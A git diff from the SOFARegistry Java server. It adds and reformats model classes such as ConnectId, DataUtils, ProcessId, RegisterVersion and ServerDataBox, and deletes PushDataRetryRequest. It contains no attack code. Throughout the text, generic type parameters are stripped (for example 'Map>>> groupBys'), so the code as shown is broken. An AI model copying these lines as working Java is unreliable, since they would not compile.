private final String sessionHostAddress; + private final int sessionPort; + + @JsonCreator(mode = JsonCreator.Mode.PROPERTIES) + public ConnectId( + @JsonProperty("clientHostAddress") String clientHostAddress, + @JsonProperty("clientPort") int clientPort, + @JsonProperty("sessionHostAddress") String sessionHostAddress, + @JsonProperty("sessionPort") int sessionPort) { + this.clientHostAddress = clientHostAddress; + this.clientPort = clientPort; + this.sessionHostAddress = sessionHostAddress; + this.sessionPort = sessionPort; + } + + public static ConnectId of(String clientAddress, String sessionAddress) { + URL clientURL = URL.valueOf(clientAddress); + URL sessionURL = URL.valueOf(sessionAddress); + return new ConnectId( + clientURL.getIpAddress(), + clientURL.getPort(), + sessionURL.getIpAddress(), + sessionURL.getPort()); + } + + public static ConnectId of(InetSocketAddress clientAddress, InetSocketAddress sessionAddress) { + return new ConnectId( + clientAddress.getAddress().getHostAddress(), + clientAddress.getPort(), + sessionAddress.getAddress().getHostAddress(), + sessionAddress.getPort()); + } + + public static ConnectId parse(String str) { + String[] strs = str.split(ValueConstants.CONNECT_ID_SPLIT); + if (strs.length != 2) { + throw new IllegalArgumentException("unknow format of ConnectId:" + str); + } + return of(strs[0], strs[1]); + } + + /** + * Getter method for property clientAddress. + * + * @return property value of clientAddress + */ + public String getClientHostAddress() { + return clientHostAddress; + } + + /** + * Getter method for property clientPort. + * + * @return property value of clientPort + */ + public int getClientPort() { + return clientPort; + } + + /** + * Getter method for property sessionAddress. + * + * @return property value of sessionAddress + */ + public String getSessionHostAddress() { + return sessionHostAddress; + } + + /** + * Getter method for property sessionPort. + * + * @return property value of sessionPort + */ + public int getSessionPort() { + return sessionPort; + } + + public String clientAddress() { + return clientHostAddress + URL.COLON + clientPort; + } + + public String sessionAddress() { + return sessionHostAddress + URL.COLON + sessionPort; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (!(o instanceof ConnectId)) return false; + ConnectId connectId = (ConnectId) o; + return clientPort == connectId.clientPort + && sessionPort == connectId.sessionPort + && Objects.equals(clientHostAddress, connectId.clientHostAddress) + && Objects.equals(sessionHostAddress, connectId.sessionHostAddress); + } + + @Override + public int hashCode() { + return Objects.hash(clientHostAddress, clientPort, sessionHostAddress, sessionPort); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(64); + sb.append(clientHostAddress) + .append(URL.COLON) + .append(clientPort) + .append(ValueConstants.CONNECT_ID_SPLIT) + .append(sessionHostAddress) + .append(URL.COLON) + .append(sessionPort); + return sb.toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/DataUtils.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/DataUtils.java new file mode 100644 index 000000000..80ef83906 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/DataUtils.java @@ -0,0 +1,105 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.apache.commons.lang.StringUtils; +import org.glassfish.jersey.internal.guava.Sets; + +public final class DataUtils { + + private DataUtils() {} + + /** instanceId/group/app - > {info.count,dataInfoId.count} */ + public static + Map>>> countGroupByInstanceIdGroupApp( + Collection infos) { + Map>>> groupBys = Maps.newHashMap(); + for (T info : infos) { + Map>> groupCount = + groupBys.computeIfAbsent(info.getInstanceId(), k -> Maps.newHashMap()); + Map> appCount = + groupCount.computeIfAbsent(info.getGroup(), k -> Maps.newHashMap()); + String appName = info.getAppName(); + if (StringUtils.isBlank(appName)) { + appName = ""; + } + List list = appCount.computeIfAbsent(appName, k -> Lists.newLinkedList()); + list.add(info); + } + Map>>> ret = Maps.newHashMap(); + for (Map.Entry>>> count : groupBys.entrySet()) { + final String instanceId = count.getKey(); + Map>> instanceCount = + ret.computeIfAbsent(instanceId, k -> Maps.newHashMap()); + for (Map.Entry>> e : count.getValue().entrySet()) { + final String group = e.getKey(); + Map> groupCount = + instanceCount.computeIfAbsent(group, k -> Maps.newHashMap()); + for (Map.Entry> apps : e.getValue().entrySet()) { + List list = apps.getValue(); + final int infoCount = list.size(); + Set dataInfoIds = Sets.newHashSetWithExpectedSize(64); + for (T t : list) { + dataInfoIds.add(t.getDataInfoId()); + } + final int dataInfoIdCount = dataInfoIds.size(); + groupCount.put(apps.getKey(), Tuple.of(infoCount, dataInfoIdCount)); + } + } + } + return ret; + } + + /** instanceId/group - > {info.count,dataInfoId.count} */ + public static + Map>> countGroupByInstanceIdGroup( + Collection infos) { + + Map>> groupBys = Maps.newHashMap(); + for (T info : infos) { + Map> groupCount = + groupBys.computeIfAbsent(info.getInstanceId(), k -> Maps.newHashMap()); + List infoList = groupCount.computeIfAbsent(info.getGroup(), k -> Lists.newLinkedList()); + infoList.add(info); + } + Map>> ret = Maps.newHashMap(); + for (Map.Entry>> instances : groupBys.entrySet()) { + final String instanceId = instances.getKey(); + for (Map.Entry> groups : instances.getValue().entrySet()) { + final String group = groups.getKey(); + List list = groups.getValue(); + final int infoCount = list.size(); + Set dataInfoIds = Sets.newHashSetWithExpectedSize(256); + for (T t : list) { + dataInfoIds.add(t.getDataInfoId()); + } + final int dataInfoIdCount = dataInfoIds.size(); + Map> groupCount = + ret.computeIfAbsent(instanceId, k -> Maps.newHashMap()); + groupCount.put(group, Tuple.of(infoCount, dataInfoIdCount)); + } + } + return ret; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ElementType.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ElementType.java index 69adfbcdf..4587b1d31 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ElementType.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ElementType.java @@ -17,20 +17,15 @@ package com.alipay.sofa.registry.common.model; /** - * * @author shangyu.wh * @version $Id: ElementType.java, v 0.1 2018-08-17 16:22 shangyu.wh Exp $ */ public enum ElementType { - /** - * sub zone scope,@see DefaultSubscriber - */ - SUBSCRIBER, - /** - * multiple zone sub,@see DefaultSubscriberMulti - */ - MULTISUBSCRIBER, - /** */ - PUBLISHER -} \ No newline at end of file + /** sub zone scope,@see DefaultSubscriber */ + SUBSCRIBER, + /** multiple zone sub,@see DefaultSubscriberMulti */ + MULTISUBSCRIBER, + /** */ + PUBLISHER +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/GenericResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/GenericResponse.java index 1f258d584..28f445aca 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/GenericResponse.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/GenericResponse.java @@ -24,47 +24,62 @@ */ public class GenericResponse extends CommonResponse { - private static final long serialVersionUID = -3986568405174281303L; + private static final long serialVersionUID = -3986568405174281303L; - private T data; + private T data; - /** - * get success response - * @param data - * @return - */ - public GenericResponse fillSucceed(T data) { - this.setSuccess(true); - this.setData(data); - return this; - } + /** + * get success response + * + * @param data + * @return + */ + public GenericResponse fillSucceed(T data) { + this.setSuccess(true); + this.setData(data); + return this; + } - /** - * get fail response - * @param msg - * @return - */ - public GenericResponse fillFailed(String msg) { - this.setSuccess(false); - this.setMessage(msg); - return this; - } + /** + * get fail response + * + * @param msg + * @return + */ + public GenericResponse fillFailed(String msg) { + this.setSuccess(false); + this.setMessage(msg); + return this; + } - /** - * Getter method for property data. - * - * @return property value of data - */ - public T getData() { - return data; - } + /** + * get fail response + * + * @param data + * @return + */ + public GenericResponse fillFailData(T data) { + this.setSuccess(false); + this.setData(data); + return this; + } - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(T data) { - this.data = data; - } -} \ No newline at end of file + /** + * Getter method for property data. + * + * @return property value of data + */ + public T getData() { + return data; + } + + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public GenericResponse setData(T data) { + this.data = data; + return this; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Node.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Node.java index 3342b422d..d47a482c6 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Node.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/Node.java @@ -17,51 +17,34 @@ package com.alipay.sofa.registry.common.model; import com.alipay.sofa.registry.common.model.store.URL; - import java.io.Serializable; /** - * * @author shangyu.wh * @version $Id: node.java, v 0.1 2017-11-28 11:59 shangyu.wh Exp $ */ public interface Node extends Serializable { - /** - * node type enum - */ - enum NodeType { - CLIENT, SESSION, META, DATA, CONSOLE - } - - /** - * node status enum - */ - enum NodeStatus { - INIT, PREPARE, WORKING - } - - /** - * get node type - * @return - */ - NodeType getNodeType(); - - /** - * get node status - * @return - */ - NodeStatus getNodeStatus(); - - /** - * set node status - * @param nodeStatus - */ - void setNodeStatus(NodeStatus nodeStatus); - - /** - * get node url - * @return - */ - URL getNodeUrl(); -} \ No newline at end of file + /** node type enum */ + enum NodeType { + CLIENT, + SESSION, + META, + DATA, + CONSOLE + } + + /** + * get node type + * + * @return + */ + NodeType getNodeType(); + + /** + * get node url + * + * @return + */ + URL getNodeUrl(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ProcessId.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ProcessId.java new file mode 100644 index 000000000..5fb79c88e --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ProcessId.java @@ -0,0 +1,103 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import java.io.Serializable; +import java.util.Objects; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-30 10:44 yuzhi.lyz Exp $ + */ +public final class ProcessId implements Serializable { + private final String hostAddress; + private final long timestamp; + private final int pid; + private final int rand; + + public ProcessId(String hostAddress, long timestamp, int pid, int rand) { + this.hostAddress = hostAddress; + this.timestamp = timestamp; + this.pid = pid; + this.rand = rand; + } + + /** + * Getter method for property address. + * + * @return property value of address + */ + public String getHostAddress() { + return hostAddress; + } + + /** + * Getter method for property timestamp. + * + * @return property value of timestamp + */ + public long getTimestamp() { + return timestamp; + } + + /** + * Getter method for property pid. + * + * @return property value of pid + */ + public int getPid() { + return pid; + } + + /** + * Getter method for property rand. + * + * @return property value of rand + */ + public int getRand() { + return rand; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (!(o instanceof ProcessId)) return false; + ProcessId processId = (ProcessId) o; + return timestamp == processId.timestamp + && pid == processId.pid + && rand == processId.rand + && Objects.equals(hostAddress, processId.hostAddress); + } + + @Override + public int hashCode() { + return Objects.hash(hostAddress, timestamp, pid, rand); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(64); + return sb.append(hostAddress) + .append('-') + .append(pid) + .append('-') + .append(timestamp) + .append('-') + .append(rand) + .toString(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishSource.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishSource.java new file mode 100644 index 000000000..2c474f912 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishSource.java @@ -0,0 +1,22 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +public enum PublishSource { + CLIENT, + DATUM_SYNCER, +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishType.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishType.java index d32dea92d..e20ca19ba 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishType.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublishType.java @@ -17,19 +17,13 @@ package com.alipay.sofa.registry.common.model; /** - * * @author shangyu.wh * @version $Id: PublishType.java, v 0.1 2018-08-29 17:11 shangyu.wh Exp $ */ public enum PublishType { - /** - * normally publisher - */ - NORMAL, - /** - * TEMPORARY publisher - */ - TEMPORARY - -} \ No newline at end of file + /** normally publisher */ + NORMAL, + /** TEMPORARY publisher */ + TEMPORARY +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherDigestUtil.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherDigestUtil.java new file mode 100644 index 000000000..ef50e73a8 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherDigestUtil.java @@ -0,0 +1,82 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.google.common.collect.Maps; +import java.util.*; + +/** + * @author kezhu.wukz + * @author shangyu.wh + * @version $Id: PublisherDigestUtil.java, v 0.1 2019-05-30 20:58 shangyu.wh Exp $ + */ +public final class PublisherDigestUtil { + private PublisherDigestUtil() {} + + public static Map digest(Map summaryMap) { + if (summaryMap.isEmpty()) { + return Collections.emptyMap(); + } + + final Map ret = Maps.newHashMapWithExpectedSize(summaryMap.size()); + for (Map.Entry e : summaryMap.entrySet()) { + final String dataInfoId = e.getKey(); + ret.put(dataInfoId, digest(e.getValue())); + } + return ret; + } + + public static DatumDigest digest(DatumSummary summary) { + int publisherNum = summary.size(); + long publisherIdSign = 0; + long publisherVerSign = 0; + long publisherTimestampSign = 0; + final TreeMap sorted = new TreeMap<>(summary.getPublisherVersions()); + long maxTimestamp = 0; + long minTimestamp = Long.MAX_VALUE; + for (Map.Entry pub : sorted.entrySet()) { + final String registerId = pub.getKey(); + final long digestRegisterId = digest(registerId); + publisherIdSign = publisherIdSign * 31 + digestRegisterId; + final RegisterVersion ver = pub.getValue(); + publisherVerSign = 31 * publisherVerSign + ver.getVersion(); + publisherTimestampSign = 31 * publisherTimestampSign + ver.getRegisterTimestamp(); + if (minTimestamp > ver.getRegisterTimestamp()) { + minTimestamp = ver.getRegisterTimestamp(); + } + if (maxTimestamp < ver.getRegisterTimestamp()) { + maxTimestamp = ver.getRegisterTimestamp(); + } + } + // save 16bits + final short max = (short) maxTimestamp; + final short min = (short) minTimestamp; + return new DatumDigest( + publisherNum, publisherIdSign, publisherVerSign, publisherTimestampSign, max, min); + } + + private static int digest(String str) { + // use string.hashCode, it's the fastest. the calc result has cached. + // but must pay attention to the compatibility of different jdk versions + // after jdk1.2, the java doc promise: + // The hash code for a String object is computed as + // s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1] + return str.hashCode(); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherUtils.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherUtils.java new file mode 100644 index 000000000..98e83c480 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PublisherUtils.java @@ -0,0 +1,59 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.google.common.collect.Maps; +import java.util.*; + +/** + * @author xiaojian.xj + * @version $Id: PublisherUtils.java, v 0.1 2020年11月12日 16:53 xiaojian.xj Exp $ + */ +public final class PublisherUtils { + private PublisherUtils() {} + + /** + * change publisher word cache + * + * @param publisher + * @return + */ + public static Publisher internPublisher(Publisher publisher) { + publisher.setRegisterId(publisher.getRegisterId()); + publisher.setDataInfoId(publisher.getDataInfoId()); + publisher.setInstanceId(publisher.getInstanceId()); + publisher.setGroup(publisher.getGroup()); + publisher.setDataId(publisher.getDataId()); + publisher.setClientId(publisher.getClientId()); + publisher.setCell(publisher.getCell()); + publisher.setProcessId(publisher.getProcessId()); + publisher.setAppName(publisher.getAppName()); + return publisher; + } + + public static Map getDatumSummary( + Map> publisherMap) { + Map sourceSummaryMap = + Maps.newHashMapWithExpectedSize(publisherMap.size()); + for (Map.Entry> e : publisherMap.entrySet()) { + sourceSummaryMap.put(e.getKey(), DatumSummary.of(e.getKey(), e.getValue())); + } + return sourceSummaryMap; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PushDataRetryRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PushDataRetryRequest.java deleted file mode 100644 index 37af0474a..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/PushDataRetryRequest.java +++ /dev/null @@ -1,66 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model; - -import com.alipay.sofa.registry.common.model.store.URL; - -import java.util.concurrent.atomic.AtomicInteger; - -/** - * - * @author shangyu.wh - * @version $Id: PushDataRetryRequest.java, v 0.1 2019-02-20 14:47 shangyu.wh Exp $ - */ -public class PushDataRetryRequest { - - private AtomicInteger retryTimes = new AtomicInteger(); - - private final T pushObj; - private final URL url; - - public PushDataRetryRequest(T pushObj, URL url) { - this.pushObj = pushObj; - this.url = url; - } - - /** - * Getter method for property retryTimes. - * - * @return property value of retryTimes - */ - public AtomicInteger getRetryTimes() { - return retryTimes; - } - - /** - * Getter method for property pushObj. - * - * @return property value of pushObj - */ - public T getPushObj() { - return pushObj; - } - - /** - * Getter method for property url. - * - * @return property value of url - */ - public URL getUrl() { - return url; - } -} \ No newline at end of file diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/RegisterVersion.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/RegisterVersion.java new file mode 100644 index 000000000..475d852db --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/RegisterVersion.java @@ -0,0 +1,105 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import java.io.Serializable; +import java.util.Objects; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 21:44 yuzhi.lyz Exp $ + */ +public final class RegisterVersion implements Serializable, Comparable { + private final long version; + private final long registerTimestamp; + + public RegisterVersion(long version, long registerTimestamp) { + this.version = version; + this.registerTimestamp = registerTimestamp; + } + + public static RegisterVersion of(long version, long registerTimestamp) { + return new RegisterVersion(version, registerTimestamp); + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Getter method for property registerTimestamp. + * + * @return property value of registerTimestamp + */ + public long getRegisterTimestamp() { + return registerTimestamp; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (!(o instanceof RegisterVersion)) return false; + RegisterVersion that = (RegisterVersion) o; + return version == that.version && registerTimestamp == that.registerTimestamp; + } + + @Override + public int hashCode() { + return Objects.hash(version, registerTimestamp); + } + + @Override + public int compareTo(RegisterVersion o) { + if (version < o.version) { + return -1; + } + if (version > o.version) { + return 1; + } + + if (registerTimestamp < o.registerTimestamp) { + return -1; + } + if (registerTimestamp > o.registerTimestamp) { + return 1; + } + return 0; + } + + public boolean orderThan(RegisterVersion o) { + return compareTo(o) < 0; + } + + @Override + public String toString() { + return "RegisterVersion{" + + "version=" + + version + + ", registerTimestamp=" + + registerTimestamp + + '}'; + } + + public RegisterVersion incrRegisterTimestamp() { + return RegisterVersion.of(this.version, this.registerTimestamp + 1); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBox.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBox.java index 75dc51877..49441d06a 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBox.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/ServerDataBox.java @@ -17,7 +17,6 @@ package com.alipay.sofa.registry.common.model; import com.fasterxml.jackson.annotation.JsonIgnore; - import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; @@ -26,189 +25,191 @@ import java.io.Serializable; /** - * * @author zhuoyu.sjw * @version $Id: ServerDataBox.java, v 0.1 2018-03-03 17:44 zhuoyu.sjw Exp $$ */ public class ServerDataBox implements Serializable { - /** UID */ - private static final long serialVersionUID = 2817539491173993030L; - /** */ - private static final int SERIALIZED_BY_JAVA = 1; - /** Null for locally instantiated, otherwise for internalized */ - private byte[] bytes; - /** Only available if bytes != null */ - private int serialization; - /** Actual object, lazy deserialized */ - private Object object; - - /** - * Instantiates a new DataBox. - */ - public ServerDataBox() { - } - - /** - * Instantiates a new DataBox. - * - * @param object the object - */ - public ServerDataBox(Object object) { - this.object = object; - } - - /** - * Instantiates a new DataBox. - * - * @param bytes the bytes - */ - public ServerDataBox(byte[] bytes) { - this.bytes = bytes; - this.serialization = SERIALIZED_BY_JAVA; - } - - /** - * Is in bytes boolean. - * - * @return boolean boolean - */ - @JsonIgnore - public boolean isInBytes() { - return bytes != null; - } - - /** - * Only when isInBytes() == false - * @return Object object - */ - public Object getObject() { - return object; - } - - /** - * transfer bytes to object - * @return Object object - * @throws IOException the io exception - * @throws ClassNotFoundException the class not found exception - */ - public Object extract() throws IOException, ClassNotFoundException { - if (isInBytes()) { - ByteArrayInputStream bis = new ByteArrayInputStream(bytes); - if (serialization != SERIALIZED_BY_JAVA) { - throw new IOException("Unsupported serialization type: " + serialization); - } - ServerDataBoxInputStream input = null; - try { - input = new ServerDataBoxInputStream(bis); - object = input.readObject(); - } finally { - if (input != null) { - input.close(); - } - } + /** UID */ + private static final long serialVersionUID = 2817539491173993030L; + /** */ + private static final int SERIALIZED_BY_JAVA = 1; + /** Null for locally instantiated, otherwise for internalized */ + private byte[] bytes; + /** Only available if bytes != null */ + private int serialization; + /** Actual object, lazy deserialized */ + private Object object; + + /** Instantiates a new DataBox. */ + public ServerDataBox() {} + + /** + * Instantiates a new DataBox. + * + * @param object the object + */ + public ServerDataBox(Object object) { + this.object = object; + } + + /** + * Instantiates a new DataBox. + * + * @param bytes the bytes + */ + public ServerDataBox(byte[] bytes) { + this.bytes = bytes; + this.serialization = SERIALIZED_BY_JAVA; + } + + /** + * Is in bytes boolean. + * + * @return boolean boolean + */ + @JsonIgnore + public boolean isInBytes() { + return bytes != null; + } + + /** + * Only when isInBytes() == false + * + * @return Object object + */ + public Object getObject() { + return object; + } + + /** + * transfer bytes to object + * + * @return Object object + * @throws IOException the io exception + * @throws ClassNotFoundException the class not found exception + */ + public Object extract() throws IOException, ClassNotFoundException { + if (object == null && isInBytes()) { + ByteArrayInputStream bis = new ByteArrayInputStream(bytes); + if (serialization != SERIALIZED_BY_JAVA) { + throw new IOException("Unsupported serialization type: " + serialization); + } + ServerDataBoxInputStream input = null; + try { + input = new ServerDataBoxInputStream(bis); + object = input.readObject(); + } finally { + if (input != null) { + input.close(); } - - return object; + } } - /** - * change object to bytes - * - * @return NSwizzle swizzle - */ - public ServerDataBox object2bytes() { - if (!isInBytes()) { - bytes = getBytes(object); - serialization = SERIALIZED_BY_JAVA; + return object; + } + + /** + * change object to bytes + * + * @return NSwizzle swizzle + */ + public ServerDataBox object2bytes() { + if (!isInBytes()) { + bytes = getBytes(object); + serialization = SERIALIZED_BY_JAVA; + } + return this; + } + + public static byte[] getBytes(Object object) { + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + ObjectOutputStream javaos = null; + try { + javaos = new ObjectOutputStream(bos); + javaos.writeObject(object); + } catch (IOException ioe) { + throw new RuntimeException(ioe); + } finally { + try { + if (null != javaos) { + javaos.close(); } - return this; + } catch (IOException ioe) { + throw new RuntimeException(ioe); + } } - - public static byte[] getBytes(Object object) { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - ObjectOutputStream javaos = null; + return bos.toByteArray(); + } + + private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { + serialization = in.readByte(); // Read serialization type + int size = in.readInt(); // Read byte stream size + bytes = new byte[size]; + in.readFully(bytes); // Read the byte stream + } + + private void writeObject(ObjectOutputStream out) throws IOException { + if (isInBytes()) { + out.writeByte(serialization); // Write serialization type + out.writeInt(bytes.length); // Write byte stream size + out.write(bytes); // Write the byte stream + } else { + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + ObjectOutputStream javaos = new ObjectOutputStream(bos); + try { + javaos.writeObject(object); + } finally { try { - javaos = new ObjectOutputStream(bos); - javaos.writeObject(object); + javaos.close(); } catch (IOException ioe) { - //do nothing - } finally { - try { - if (null != javaos) { - javaos.close(); - } - } catch (IOException ioe) { - //do nothing - } + throw new RuntimeException(ioe); } - return bos.toByteArray(); + } + out.writeByte(SERIALIZED_BY_JAVA); // Write serialization type + out.writeInt(bos.size()); // Write byte stream size + out.write(bos.toByteArray()); // Write the byte stream } - - private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { - serialization = in.readByte(); // Read serialization type - int size = in.readInt(); // Read byte stream size - bytes = new byte[size]; - in.readFully(bytes); // Read the byte stream - } - - private void writeObject(ObjectOutputStream out) throws IOException { - if (isInBytes()) { - out.writeByte(serialization); // Write serialization type - out.writeInt(bytes.length); // Write byte stream size - out.write(bytes); // Write the byte stream - } else { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - ObjectOutputStream javaos = new ObjectOutputStream(bos); - try { - javaos.writeObject(object); - } finally { - try { - javaos.close(); - } catch (IOException ioe) { - //do nothing - } - } - out.writeByte(SERIALIZED_BY_JAVA); // Write serialization type - out.writeInt(bos.size()); // Write byte stream size - out.write(bos.toByteArray()); // Write the byte stream - } - } - - /** - * Get bytes byte [ ]. - * - * @return byte[] byte [ ] - */ - public byte[] getBytes() { - return bytes; - } - - /** - * Set bytes byte [ ]. - * - * @return byte[] byte [ ] - */ - public void setBytes(byte[] bytes) { - this.bytes = bytes; - } - - /** - * Gets serialization. - * - * @return int serialization - */ - public int getSerialization() { - return this.serialization; - } - - /** - * Sets serialization. - * - * @param serial the serial - */ - public void setSerialization(int serial) { - this.serialization = serial; - } - + } + + public int byteSize() { + final byte[] b = bytes; + return b != null ? b.length : 0; + } + + /** + * Get bytes byte [ ]. + * + * @return byte[] byte [ ] + */ + public byte[] getBytes() { + return bytes; + } + + /** + * Set bytes byte [ ]. + * + * @return byte[] byte [ ] + */ + public void setBytes(byte[] bytes) { + this.bytes = bytes; + } + + /** + * Gets serialization. + * + * 